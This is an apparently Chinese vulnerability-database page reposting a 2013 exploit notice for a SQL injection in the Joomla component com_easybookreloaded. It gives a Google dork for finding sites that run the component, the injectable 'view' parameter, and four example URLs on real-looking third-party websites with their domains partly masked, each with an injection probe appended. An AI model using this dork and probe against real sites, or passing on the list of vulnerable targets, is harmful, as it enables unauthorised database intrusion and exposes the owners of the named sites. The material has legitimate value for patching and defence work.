Joomla Component com_easybookreloaded Sql Injection Vulnerability

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1044689 漏洞类型
发布时间 2013-08-01 更新时间 2013-08-01
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2013080010
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
////////////////////////////////////////////
// Title : Joomla Component com_easybookreloaded Sql Injection Vulnerability
// Date : 30 July 2013
// Version : 1.5x
// Author : Altiiever
// Google dork : inurl:"index.php?option=com_easybookreloaded"
// Download : Search Here -> http://extensions.joomla.org
////////////////////////////////////////////
 
Vuln
========
http://127.0.0.1/[PATH]index.php?option=com_easybookreloaded&view=[number]
 
http://127.0.0.1/[PATH]index.php?option=com_easybookreloaded&view=1[SQL]
 
 
Example
========
http://www.vololibXband.it/home/index.php?option=com_easybookreloaded&view=50'
http://www.alucraeXernegi.com/index.php?option=com_easybookreloaded&view=easybookreloaded&Itemid=142'
http://www.siXrsawmill.com/index.php?option=com_easybookreloaded&view=easybookreloaded&Itemid=28'
http://ay-X.com/index.php?option=com_easybookreloaded&view=easybookreloaded&Itemid=66'